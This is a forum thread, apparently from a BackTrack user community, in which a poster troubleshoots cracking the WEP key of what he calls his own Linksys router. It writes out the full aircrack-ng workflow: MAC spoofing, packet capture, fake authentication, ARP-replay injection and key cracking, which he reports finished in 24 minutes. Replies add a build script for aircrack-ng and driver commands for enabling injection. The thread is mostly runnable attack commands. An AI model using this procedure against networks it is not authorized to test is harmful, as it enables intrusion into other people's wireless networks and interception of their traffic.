First Post - Newb Question

[JohnMa69]

First let me say thanks to all the people on the forum and people who have made BT what it is. Still getting the feet wet but its been fun for the week or so I have had the cd.

I have made BT2 on my Thumbdrive and it works great with my laptop. Have to use the "bt acpi=off" to start but everything else works fine. I am using a Linksys WUSB54GC adapter and I have searched thru the tuts and forums in the newb section and wireless section and tried a few of the tips that have been posted so far all is well untill today.

I am running against my linksys 54g router c 6 64bit

I start out like this:

Airmon-ng stop rausb0
ifconfig rausb0 down
macchanger --mac 00:11:22:33:44:55 rausb0
airmon-ng start rausb0
airodump-ng rausb0 get my mac and id webby
airodump-ng -c 6 -w webbytest --bssid [routermac] rausb0
aireplay-ng -1 0 -e webby -a [routermac] -h [00:11:22:33:44:55] rausb0
aireplay-ng -3 -b [routermac] -h [00:11:22:33:44:55] rausb0
aircrack-ng -n 64 -b [routermac] [capturefilename.cap]

I have tried webby.cap webby-01.cap and also in aireplay it says "saving arp requests in replay_arp-0727-213413.cap, I tried this file also. Sometimes aircrack starts and says 8 packets found need more other times file can't be opened or not found. I tried the "updatedb" and "locate" from other post for a thumbdrive but nothing happened and nothing was found. Power level is good above 85 and I am seeing packets in airodump-ng. I did have one time where I got a Deauth/Disassoc packet, but I stopped and started again and things have been fine. I'm about 10 feet from my router. I also had another laptop running pulling some files from the net hoping this would help.

I know the wireless card works, checked the list and forums, tried the help others have been giving and I can inject and monitor. My question is why am I getting all the packets but not getting anything in my files and while file should it be saving to? The one I give it with the -w filecapname or from aireplay-ng?

I have tried for about the last couple hours with no luck, the shortest time I ran the suite I got 100180 packets (93932 ARP requests) sent 321872 packets, which was about 10 mins ago before this post and I when I ran
aircrack-ng -n 64 -b [routermac] capfile.cap
I still got read 8 packets "Not enough yada yada 250k+...."

What am I missing? If its right in front of me please feel free to smack me, I'm still reading the post's that are here but I have a long way to go before Im done.

Thanks for any help.

John

[JohnMa69]

I went back thru and tried all of this again on a desktop using the same Linksys usb card, the live cd not my thumbdrive version. When I started aireplay, airodump stopped after 1-2 mins, my ap just left. I stopped airodump and started again with the same settings
airodump-ng -c 6 -w webbytest --bssid [routermac] rausb0
and I looked into root and there was the file.
webbytest-01.cap

The packets are being captured and the file now has ivs. Have a screwed up my jumpdrive or missed a boot setting when starting BT? I cracked my key in 24 mins. (aircrack 0.7 r214)

[PrairieFire]

If your going to be using the Live USB method I would first suggest updating to aircrack-ng 0.9.1+ using this method:
Copy paste into a blank kwrite session and save-as moduleupdate

Code:

#!/bin/sh
echo " Creating Airecrack-ng Module..."
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
tar -xf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make && checkinstall -y
/usr/bin/tgz2lzm aircrack-ng-0.9.1-i386-1.tgz aircrack-ng-0.9.1.lzm
cp aircrack-ng-0.9.1.lzm /mnt/sd*_removable/bt/modules/
cd
rm -r aircrack-ng-0.9.1.tar.gz
rm -r aircrack-ng-0.9.1
echo "DONE"

Then

Code:

chmod 755 moduleupdate

Now just type moduleupdate and it will do everything for you, After a reboot you will notice you now have aircrack-ng 0.9.1+

Then i would use this tutorial on the aircrack-ng site.

* For more scripts and module creation scripts look here.

[shamanvirtuel]

you are a lazy boy !!! i have given solution for this in many threads....

spoonfeeding time...again
ifconfig rausb0 up
iwconfig rausb0 mode monitor channel XX rate 1M
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1

here you are ready for injection .....
also you can update with last aspj driver (reliz 1.0.1 out BTW)
this last one allow card to use fragmentation attack wich is not supported in native drivers(but others works)

[JohnMa69]

Just wanted to say "Thank you" To both of you! for your help. I'll go sit in the corner now... = (